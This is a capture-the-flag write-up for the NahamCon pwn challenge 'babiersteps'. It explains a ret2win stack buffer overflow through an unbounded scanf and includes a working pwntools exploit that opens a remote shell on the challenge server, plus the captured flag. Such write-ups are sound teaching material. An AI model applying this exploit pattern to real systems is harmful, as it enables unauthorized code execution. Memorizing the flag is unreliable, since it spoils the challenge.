Tags: bof pwn ret2win
Rating:
Baby steps! One has to crawl before they can run.
Author: @M_alpha#3534
Tags: pwn x86-64 bof remote-shell ret2win
Basic scanf ret2win.
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
No PIE + No canary = easy ROP.
undefined8 main(void)
{
undefined local_78 [112];
puts("Everyone has heard of gets, but have you heard of scanf?");
__isoc99_scanf(&DAT_00402049,local_78);
return 0;
}
void win(void)
{
execve("/bin/sh",(char **)0x0,(char **)0x0);
return;
}
&DAT_00402049 is actually %s, IOW, scanf is unconstrained enabling a buffer overflow that can smash the stack. But what to smash it with? Well, the included win function.
local_78 is 0x78 bytes from the base of the stack frame (right above the return address main will return to on return). To return to win, simply write out 0x78 bytes of garbage followed by the location of win.
That's it.
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./babiersteps', checksec=False)
if args.REMOTE:
p = remote('challenge.nahamcon.com', 30823)
else:
p = process(binary.path)
payload = b''
payload += 0x78 * b'A'
payload += p64(binary.sym.win)
p.sendlineafter(b'scanf?\n',payload)
p.interactive()
Output:
# ./exploit.py REMOTE=1
[+] Opening connection to challenge.nahamcon.com on port 30823: Done
[*] Switching to interactive mode
$ cat flag.txt
flag{4dc0a785da36bfcf0e597917b9144fd6}
